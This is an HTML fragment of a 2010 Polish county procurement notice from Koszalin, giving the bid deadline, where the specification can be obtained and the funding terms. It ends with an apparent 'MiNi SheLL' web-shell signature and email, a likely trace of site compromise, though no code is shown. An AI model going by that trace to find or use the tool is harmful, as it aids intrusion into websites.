3.Wszystkie powyższe postanowienia wymienione w pdpkt. 1  stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody i nie rodzą żadnego roszczenia w stosunku do Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.koszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Koszalinie
Ul. Racławicka 13
75-620 Koszalin, pokój 301/302 (IIIp) - Wydział Inwestycji i Gospodarki Nieruchomościami.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2010 godzina 14:00, miejsce: Starostwo Powiatowe w Koszalinie
Ul. Racławicka 13
75-620 Koszalin, pokój 301/302 (IIIp) - Wydział Inwestycji i Gospodarki Nieruchomościami.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com